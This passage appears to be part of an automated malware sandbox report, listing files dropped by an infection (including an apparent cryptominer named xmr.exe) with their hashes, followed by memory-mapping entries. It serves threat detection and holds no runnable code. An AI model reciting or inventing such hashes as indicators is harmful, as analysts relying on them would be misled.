      • \Program Files (x86)\Company\NewProduct\namdoitntn.exe
        Filesize

        245KB

        MD5

        b16134159e66a72fb36d93bc703b4188

        SHA1

        e869e91a2b0f77e7ac817e0b30a9a23d537b3001

        SHA256

        b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c

        SHA512

        3fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c

      • \Program Files (x86)\Company\NewProduct\safert44.exe
        Filesize

        244KB

        MD5

        dbe947674ea388b565ae135a09cc6638

        SHA1

        ae8e1c69bd1035a92b7e06baad5e387de3a70572

        SHA256

        86aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709

        SHA512

        67441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893

      • \Program Files (x86)\Company\NewProduct\tag12312341.exe
        Filesize

        107KB

        MD5

        79fdcf857590d4f59c00b6eb98546a50

        SHA1

        7bf3cc1ae2b249c555d0a2f0d2b6598684f2119a

        SHA256

        ed735079b2235ea53394cf15f60362f56fdba508ee1fb163972cf966567c1a21

        SHA512

        767b53ad1889e47f3053d306573b3e1ff87a7a68e44ce0e004a1c80a883b6aa319a1ea128989f9490244affe2e04b3f0865372c7e9eade36f52b37bb084e0013

      • \Program Files (x86)\Company\NewProduct\willilawilwilililw.exe
        Filesize

        107KB

        MD5

        2f59b9e75115022399c9f1e6c1ac1649

        SHA1

        058b4934b0062208189467c56ded9084af711d79

        SHA256

        09da5a6638115a67d73b3641c648e924defcc731b8612481652953e72f9674ab

        SHA512

        60996c19a7a6c9c7755974305244ae71dd72fc6f591b587847c0ae874723b9b2997b8f022c7ab165031692036abb10a2404bfe2012deab817c8092bad977cd6d

      • \ProgramData\pol\etc.exe
        Filesize

        4.6MB

        MD5

        f5f6cfc1d9e8d3b2be6e8aaf6089a27b

        SHA1

        1570c5d903c1032f9cd84458491d7cc7f380d306

        SHA256

        c7e1aa53dc667581f37bcbd0793c2ef909e8a4461c59641cb2c672ebe192609c

        SHA512

        8246df55014d53b0c777d9d14fda156dff2d14183451e1b448e27d514585bf9be40ee063f65074facc0c8850d565242950ccb329baecd21d83b6e47449b7f8ca

      • \ProgramData\pol\xmr.exe
        Filesize

        5.1MB

        MD5

        7449de937593cb2d60b2d9022908ec69

        SHA1

        16f658bfa5ef91be13326d3000f905c84d525085

        SHA256

        56242edc2a39b6ae24e5c6defec47be2c99a69e73a96128dd02d4f0222509260

        SHA512

        e8f31c5669aa1529e1ef5729a0a793ec7aa1ccd9fe8d51ed6ba3575d716b7d2d8b3168890a9530c24a2bbee5f9e706839d5a4a0c8fa0dff4757d981e67da5968

      • \Users\Admin\AppData\Local\Temp\samagon.exe
        Filesize

        837KB

        MD5

        82d79c7429d68e9a0c7f6e6051333883

        SHA1

        2a2be7a4744f9ac1405b483dd6e586eb85d3a6e5

        SHA256

        fce13579ece5e9a9bd4c343f917b4456ff15b9a5a31e39106c1e8a146dfdde54

        SHA512

        6cb279cbdec4d5e360c66bccaf26983bbe4c5c030cf37201f90f18a192414373e933799ee127a2c07da896a899b294d6ef2be29cf169981c85a979d0614a2fb7

      • memory/960-83-0x00000000010B0000-0x00000000010F4000-memory.dmp
        Filesize

        272KB

      • memory/960-91-0x0000000000280000-0x0000000000286000-memory.dmp
        Filesize

        24KB

      • memory/960-56-0x0000000000000000-mapping.dmp
      • memory/1472-84-0x0000000000AB0000-0x0000000000AD0000-memory.dmp
        Filesize

        128KB

      • memory/1472-68-0x0000000000000000-mapping.dmp
      • memory/1496-64-0x0000000000000000-mapping.dmp
      • memory/1496-92-0x00000000002E0000-0x00000000002E6000-memory.dmp
        Filesize

        24KB

      • memory/1496-85-0x0000000000A20000-0x0000000000A64000-memory.dmp
        Filesize

        272KB

      • memory/1524-54-0x0000000076311000-0x0000000076313000-memory.dmp
        Filesize

        8KB

      • memory/1528-139-0x0000000000CC0000-0x0000000001798000-memory.dmp
        Filesize

        10.8MB

      • memory/1528-95-0x0000000000CC0000-0x0000000001798000-memory.dmp
        Filesize

        10.8MB

      • memory/1528-88-0x0000000000CC0000-0x0000000001798000-memory.dmp
        Filesize

        10.8MB

      • memory/1528-76-0x0000000000000000-mapping.dmp
      • memory/1528-109-0x0000000000CC0000-0x0000000001798000-memory.dmp
        Filesize

        10.8MB

      • memory/1528-94-0x0000000000CC0000-0x0000000001798000-memory.dmp
        Filesize

        10.8MB

      • memory/1608-82-0x00000000000C0000-0x0000000000104000-memory.dmp
        Filesize

        272KB

      • memory/1608-90-0x0000000000210000-0x0000000000216000-memory.dmp
        Filesize

        24KB

      • memory/1608-79-0x0000000000000000-mapping.dmp
      • memory/1828-86-0x0000000000E00000-0x0000000000E20000-memory.dmp
        Filesize

        128KB

      • memory/1828-59-0x0000000000000000-mapping.dmp
      • memory/1956-73-0x0000000000000000-mapping.dmp
      • memory/3252-141-0x0000000000000000-0x0000000001000000-memory.dmp
        Filesize

        16.0MB

      • memory/3252-127-0x0000000000000000-mapping.dmp
      • memory/3252-137-0x0000000000000000-0x0000000001000000-memory.dmp
        Filesize

        16.0MB

      • memory/3252-129-0x0000000000070000-0x0000000000090000-memory.dmp
        Filesize

        128KB

      • memory/3252-138-0x0000000000000000-0x0000000001000000-memory.dmp
        Filesize

        16.0MB

      • memory/3544-135-0x000000013FB00000-0x000000014032B000-memory.dmp
        Filesize

        8.2MB

      • memory/3544-136-0x000000013FB00000-0x000000014032B000-memory.dmp
        Filesize

        8.2MB

      • memory/3544-132-0x0000000000000000-mapping.dmp
      • memory/3808-115-0x000007FEFC3B1000-0x000007FEFC3B3000-memory.dmp
        Filesize

        8KB

      • memory/3808-114-0x0000000000F60000-0x0000000001038000-memory.dmp
        Filesize

        864KB

      • memory/3808-111-0x0000000000000000-mapping.dmp
      • memory/3940-116-0x0000000000000000-mapping.dmp
      • memory/3980-118-0x0000000000000000-mapping.dmp
      • memory/4000-134-0x000000013FB00000-0x000000014032B000-memory.dmp
        Filesize

        8.2MB

      • memory/4000-122-0x0000000001310000-0x00000000013E8000-memory.dmp
        Filesize

        864KB

      • memory/4000-119-0x0000000000000000-mapping.dmp
      • memory/4000-140-0x000000013FB00000-0x000000014032B000-memory.dmp
        Filesize

        8.2MB

      • memory/4064-124-0x0000000000000000-mapping.dmp
      • memory/4092-125-0x0000000000000000-mapping.dmp